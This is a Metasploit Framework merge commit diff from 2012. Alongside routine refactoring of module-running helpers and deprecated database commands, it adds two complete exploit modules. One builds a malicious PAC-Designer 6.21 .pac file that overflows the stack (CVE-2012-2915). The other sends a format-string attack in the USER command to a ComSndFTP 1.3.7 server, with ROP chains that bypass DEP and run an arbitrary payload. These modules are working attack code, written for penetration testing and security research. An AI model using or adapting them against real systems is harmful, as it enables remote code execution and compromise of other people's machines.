Merge branch 'master' into feature/vuln-info

2012-06-14 16:21:51 -05:00 · 2012-06-14 16:21:51 -05:00 · 8177783681
parent e59b33fc76 e2c1657eb4
commit 8177783681
10 changed files with 408 additions and 13 deletions
--- a/documentation/users_guide_4.2.pdf
+++ b/documentation/users_guide_4.2.pdf
--- a/lib/msf/base/simple/auxiliary.rb
+++ b/lib/msf/base/simple/auxiliary.rb
@ -40,11 +40,12 @@ module Auxiliary
 	# 	Whether or not the exploit should be run in the context of a background
 	# 	job.
 	#
-	def self.run_simple(omod, opts = {})
+	def self.run_simple(omod, opts = {}, &block)

 		# Clone the module to prevent changes to the original instance
 		mod = omod.replicant
 		Msf::Simple::Framework.simplify_module( mod, false )
+		yield(mod) if block_given?

 		# Import options from the OptionStr or Option hash.
 		mod._import_extra_options(opts)
@ -80,6 +81,7 @@ module Auxiliary
 			self.job_run_proc(ctx)
 			self.job_cleanup_proc(ctx)
 		end
+
 	end

 	#
--- a/lib/msf/base/simple/exploit.rb
+++ b/lib/msf/base/simple/exploit.rb
@ -54,14 +54,14 @@ module Exploit
 	# 	Whether or not the exploit should be run in the context of a background
 	# 	job.
 	#
-	def self.exploit_simple(oexploit, opts)
+	def self.exploit_simple(oexploit, opts, &block)
 		# Trap and print errors here (makes them UI-independent)
 		begin

 			# Clone the module to prevent changes to the original instance
 			exploit = oexploit.replicant
 			Msf::Simple::Framework.simplify_module( exploit, false )
-
+			yield(exploit) if block_given?
 		
 			# Import options from the OptionStr or Option hash.
 			exploit._import_extra_options(opts)
--- a/lib/msf/base/simple/payload.rb
+++ b/lib/msf/base/simple/payload.rb
@ -40,11 +40,12 @@ module Payload
 	#   NoKeyError => No valid encoder key could be found
 	#   ArgumentParseError => Options were supplied improperly
 	#
-	def self.generate_simple(payload, opts)
+	def self.generate_simple(payload, opts, &block)

 		# Clone the module to prevent changes to the original instance
 		payload = payload.replicant
 		Msf::Simple::Framework.simplify_module(payload)
+		yield(payload) if block_given?

 		# Import any options we may need
 		payload._import_extra_options(opts)
--- a/lib/msf/base/simple/post.rb
+++ b/lib/msf/base/simple/post.rb
@ -36,11 +36,12 @@ module Post
 	# 	Whether or not the module should be run in the context of a background
 	# 	job.
 	#
-	def self.run_simple(omod, opts = {})
+	def self.run_simple(omod, opts = {}, &block)

 		# Clone the module to prevent changes to the original instance
 		mod = omod.replicant
 		Msf::Simple::Framework.simplify_module( mod, false )
+		yield(mod) if block_given?

 		# Import options from the OptionStr or Option hash.
 		mod._import_extra_options(opts)
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@ -52,6 +52,17 @@ class Db
 			base.merge(more)
 		end

+		def deprecated_commands
+			[
+				"db_autopwn",
+				"db_driver",
+				"db_hosts",
+				"db_notes",
+				"db_services",
+				"db_vulns",
+			]
+		end
+
 		#
 		# Returns true if the db is connected, prints an error and returns
 		# false if not.
@ -1073,15 +1084,44 @@ class Db
 		}
 		end

+		# :category: Deprecated Commands
+		def cmd_db_hosts_help; deprecated_help(:hosts); end
+		# :category: Deprecated Commands
+		def cmd_db_notes_help; deprecated_help(:notes); end
+		# :category: Deprecated Commands
+		def cmd_db_vulns_help; deprecated_help(:vulns); end
+		# :category: Deprecated Commands
+		def cmd_db_services_help; deprecated_help(:services); end
+		# :category: Deprecated Commands
+		def cmd_db_autopwn_help; deprecated_help; end
+		# :category: Deprecated Commands
+		def cmd_db_driver_help; deprecated_help; end

+		# :category: Deprecated Commands
+		def cmd_db_hosts(*args); deprecated_cmd(:hosts, *args); end
+		# :category: Deprecated Commands
+		def cmd_db_notes(*args); deprecated_cmd(:notes, *args); end
+		# :category: Deprecated Commands
+		def cmd_db_vulns(*args); deprecated_cmd(:vulns, *args); end
+		# :category: Deprecated Commands
+		def cmd_db_services(*args); deprecated_cmd(:services, *args); end
+		# :category: Deprecated Commands
+		def cmd_db_autopwn(*args); deprecated_cmd; end
+
+		# :category: Deprecated Commands
 		#
-		# Determine if an IP address is inside a given range
+		# This one deserves a little more explanation than standard deprecation
+		# warning, so give the user a better understanding of what's going on.
 		#
-		def range_include?(ranges, addr)
-			ranges.each do |range|
-				return true if range.include? addr
-			end
-			false
+		def cmd_db_driver(*args)
+			deprecated_cmd
+			print_line
+			print_line "Because Metasploit no longer supports databases other than the default"
+			print_line "PostgreSQL, there is no longer a need to set the driver. Thus db_driver"
+			print_line "is not useful and its functionality has been removed. Usually Metasploit"
+			print_line "will already have connected to the database; check db_status to see."
+			print_line
+			cmd_db_status
 		end

 		def cmd_db_import_tabs(str, words)
--- a/lib/rex/ui/text/dispatcher_shell.rb
+++ b/lib/rex/ui/text/dispatcher_shell.rb
@ -35,11 +35,23 @@ module DispatcherShell
 		#
 		# Returns nil for an empty set of commands.
 		#
-		# This method should be overridden
+		# This method should be overridden to return a Hash with command
+		# names for keys and brief help text for values.
 		#
 		def commands
 		end

+		#
+		# Returns an empty set of commands.
+		#
+		# This method should be overridden if the dispatcher has commands that
+		# should be treated as deprecated. Deprecated commands will not show up in
+		# help and will not tab-complete, but will still be callable.
+		#
+		def deprecated_commands
+			[]
+		end
+
 		#
 		# Wraps shell.print_error
 		#
@ -75,6 +87,33 @@ module DispatcherShell
 			shell.print(msg)
 		end

+		#
+		# Print a warning that the called command is deprecated and optionally
+		# forward to the replacement +method+ (useful for when commands are
+		# renamed).
+		#
+		def deprecated_cmd(method=nil, *args)
+			cmd = caller[0].match(/`cmd_(.*)'/)[1]
+			print_error "The #{cmd} command is DEPRECATED"
+			if cmd == "db_autopwn"
+				print_error "See http://r-7.co/xY65Zr instead"
+			elsif method and self.respond_to?("cmd_#{method}")
+				print_error "Use #{method} instead"
+				self.send("cmd_#{method}", *args)
+			end
+		end
+
+		def deprecated_help(method=nil)
+			cmd = caller[0].match(/`cmd_(.*)_help'/)[1]
+			print_error "The #{cmd} command is DEPRECATED"
+			if cmd == "db_autopwn"
+				print_error "See http://r-7.co/xY65Zr instead"
+			elsif method and self.respond_to?("cmd_#{method}_help")
+				print_error "Use 'help #{method}' instead"
+				self.send("cmd_#{method}_help")
+			end
+		end
+
 		#
 		# Wraps shell.update_prompt
 		#
@ -337,7 +376,7 @@ module DispatcherShell
 				next if not dispatcher.respond_to?('commands')

 				begin
-					if (dispatcher.commands.has_key?(method))
+					if (dispatcher.commands.has_key?(method) or dispatcher.deprecated_commands.include?(method))
 						self.on_command_proc.call(line.strip) if self.on_command_proc
 						run_command(dispatcher, method, arguments)
 						found = true
--- a/modules/auxiliary/scanner/http/lucky_punch.rb
+++ b/modules/auxiliary/scanner/http/lucky_punch.rb
@ -18,6 +18,7 @@ class Metasploit3 < Msf::Auxiliary

 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Auxiliary::Scanner
+	include Msf::Auxiliary::WmapModule


 	def initialize(info = {})
--- a/modules/exploits/windows/fileformat/lattice_pac_bof.rb
+++ b/modules/exploits/windows/fileformat/lattice_pac_bof.rb
@ -0,0 +1,109 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
+			'Description'    => %q{
+					This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer
+				6.21.  As a .pac file, when supplying a long string of data to the 'value' field
+				under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption
+				on the stack, which results in arbitrary code execution under the context of the
+				user.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Unknown',      #Discovery
+					'juan vazquez', #Metasploit
+					'sinn3r'        #Metasploit
+				],
+			'References'     =>
+				[
+					['CVE', '2012-2915'],
+					['OSVDB', '82001'],
+					['EDB', '19006'],
+					['BID', '53566'],
+					['URL', 'http://secunia.com/advisories/48741']
+				],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00\x3c\x3e",
+					'StackAdjustment' => -3500,
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => "seh"
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[
+						'PAC-Designer 6.21 on Windows XP SP3',
+						{
+							# P/P/R in PACD621.exe
+							# ASLR: False, Rebase: False, SafeSEH: False, OS: False
+							'Ret' => 0x00805020
+						}
+					],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "May 16 2012",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [true, 'The filename', 'msf.pac'])
+			], self.class)
+	end
+
+	def exploit
+		# The payload is placed in the <title> field
+		p = payload.encoded
+
+		# The trigger is placed in the <value> field, which will jmp to our
+		# payload in the <title> field.
+		buf  = "\x5f"    #POP EDI
+		buf << "\x5f"    #POP EDI
+		buf << "\x5c"    #POP ESP
+		buf << "\x61"*6  #POPAD x 6
+		buf << "\x51"    #PUSH ECX
+		buf << "\xc3"    #RET
+		buf << rand_text_alpha(96-buf.length, payload_badchars)
+		buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}"  #Jmp back to the beginning of the buffer
+		buf << [target.ret].pack('V')[0,3] # Partial overwrite
+
+		xml = %Q|<?xml version="1.0"?>
+<PacDesignData>
+	<DocFmtVersion>1</DocFmtVersion>
+	<DeviceType>ispPAC-CLK5410D</DeviceType>
+	<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
+	<SummaryInformation>
+		<Title>#{p}</Title>
+		<Author>#{Rex::Text.rand_text_alpha(6)}</Author>
+	</SummaryInformation>
+
+	<SymbolicSchematicData>
+		<Symbol>
+			<SymKey>153</SymKey>
+			<NameText>Profile 0 Ref Frequency</NameText>
+			<Value>#{buf}</Value>
+		</Symbol>
+	</SymbolicSchematicData>
+</PacDesignData>|
+
+		file_create(xml)
+	end
+end
+
--- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
+++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
@ -0,0 +1,202 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'          => 'ComSndFTP v1.3.7 Beta USER Buffer Overflow',
+			'Description'   => %q{
+					This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
+				crafted format string specifier as a username. The crafted username is sent to to the server to
+				overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
+				is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
+				The SEH exit function is preferred so that the administrators are not left with an unhandled
+				exception message. When using the meterpreter payload, the process will never die, allowing
+				for continuous exploitation.
+			},
+			'Author'        =>
+				[
+					'ChaoYi Huang <ChaoYi.Huang[at]connect.polyu.hk>', # vuln discovery + poc
+					'rick2600 <rick2600[at]corelan.be>',               # msf module (target XP)
+					'mr_me <mr_me[at]@corelan.be>',                    # msf module (target 23k)
+					'corelanc0d3r <peter.ve[at]corelan.be>'            # msf module
+				],
+			'Arch'          => [ ARCH_X86 ],
+			'License'       => MSF_LICENSE,
+			'Version'       => '$Revision$',
+			'References'    =>
+				[
+					# When a DoS is NOT a DoS
+					[ 'EDB', '19024']
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'seh'
+				},
+			'Platform'      => ['win'],
+			'Privileged'    => false,
+			'Payload'       =>
+				{
+					'Space'            => 1000,
+					'BadChars'         => "\x00\x0a\x0d",
+					'StackAdjustment'  => -3500,
+					'DisableNops'      => 'True'
+				},
+			'Targets'       =>
+				[
+					[
+						'Windows XP SP3 - English',
+						{
+							'Functionpointer'   => 0x71AC4050,  # winsock pointer
+							'Functionaddress'   => 0x71AB2636,  # the repair address
+							'Pivot'             => 0x00408D16,  # 0x004093AE-0x698 add esp, 72c ; retn
+							'Pad' => 568
+						}
+					],
+					[
+						'Windows Server 2003 - English',
+						{
+							'Functionpointer'   => 0x71C14044,  # winsock pointer
+							'Functionaddress'   => 0x71C02661,  # the repair address
+							'Pivot'             => 0x00408D16,  # 0x004093AE-0x698 add esp, 72c ; retn
+							'Pad' => 568
+						}
+					]
+				],
+			'DisclosureDate' => 'Jun 08 2012'))
+
+		register_options(
+			[
+				Opt::RPORT(21),
+			], self.class)
+	end
+
+	def check
+		connect
+		banner    = sock.get(-1,3)
+		validate  = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"
+		validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"
+		validate << "\xf1\xc6\xf7\x21\x0d\x0a"
+		disconnect
+
+		if (banner == validate)
+			return Exploit::CheckCode::Vulnerable
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+	def junk(n=4)
+		return rand_text_alpha(n).unpack("V").first
+	end
+
+	def exploit
+
+		rop = ''
+		if target.name =~ /Server 2003/
+			# C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959
+			rop = [
+				0x77be3adb, # pop eax ; retn
+				0x77ba1114, # <- *&VirtualProtect()
+				0x77bbf244, # mov eax,[eax] ; pop ebp ; retn
+				junk,
+				0x77bb0c86, # xchg eax,esi ; retn
+				0x77be3adb, # pop eax ; retn
+				0xFFFFFBFF, # dwSize
+				0x77BAD64D, # neg eax ; pop ebp ; retn
+				junk,
+				0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn
+				0x77bbfc02, # pop ecx ; retn
+				0x77bef001, # ptr that is w+
+				0x77bd8c04, # pop edi ; retn
+				0x77bd8c05, # retn
+				0x77be3adb, # pop eax ; retn
+				0xFFFFFFC0, # flNewProtect
+				0x77BAD64D, # neg eax ; pop ebp ; retn
+				0x77be2265, # ptr to 'push esp ; ret'
+				0x77BB8285, # xchg eax,edx ; retn
+				0x77be3adb, # pop eax ; retn
+				0x90909090, # nops
+				0x77be6591, # pushad ; add al,0ef ; retn
+			].pack("V*")
+
+		elsif target.name =~ /XP SP3/
+			# C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512
+			rop = [
+				0x77C21D16, # pop eax ; retn
+				0x77C11120, # <- *&VirtualProtect()
+				0x77C2E493, # mov eax,[eax] ; pop ebp ; retn
+				junk,
+				0x77C21891, # pop esi ; retn
+				0x77C5D010, # ptr that is w+
+				0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn
+				0x77C21D16, # pop eax ; retn
+				0xFFFFFBFF, # dwSize
+				0x77C1BE18, # neg eax ; pop ebp ; retn
+				junk,
+				0x77C2362C, # pop ebx ; retn
+				0x77C5D010, # ptr that is w+
+				0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn
+				0x77C1F519, # pop ecx ; retn
+				0x77C5D010, # ptr that is w+
+				0x77C23B47, # pop edi ; retn
+				0x77C23B48, # retn
+				0x77C21D16, # pop eax ; retn
+				0xFFFFFFC0, # flNewProtect
+				0x77C1BE18, # neg eax ; pop ebp ; retn
+				0x77C35459, # ptr to 'push esp ; ret'
+				0x77C58FBC, # xchg eax,edx ; retn
+				0x77C21D16, # pop eax ; retn
+				0x90909090, # nops
+				0x77C567F0, # pushad ; add al,0ef ; retn
+			].pack("V*")
+		end
+
+		stage1 = %Q{
+			mov eax, #{target['Functionpointer']}
+			mov ecx, #{target['Functionaddress']}
+			mov [eax], ecx
+		}
+
+		offset_wp = rand_text_alphanumeric(1)
+		pivot     = target['Pivot']
+		offset    = target['Pad'] + rop.length + stage1.length + payload.encoded.length
+
+		attackstring  = rand_text_alphanumeric(7)
+		attackstring << [target['Functionpointer']].pack('V')
+		attackstring << "%#{pivot}x"                          # special pointer to our pivot
+		attackstring << "%p" * 208 + "#{offset_wp }%n"        # format specifiers to read and write the function pointer
+		attackstring << rand_text_alphanumeric(target['Pad'])
+		attackstring << rop
+		attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string
+		attackstring << payload.encoded
+		attackstring << rand_text_alphanumeric(2000 - offset)
+		attackstring << "\r\n"
+
+		sploit = "USER #{attackstring}\r\n"
+
+		print_status("Triggering overflow...")
+		connect
+		sock.get_once(1024)
+		sock.put(sploit)
+		select(nil, nil, nil, 2)
+		handler
+		disconnect
+
+	end
+
+end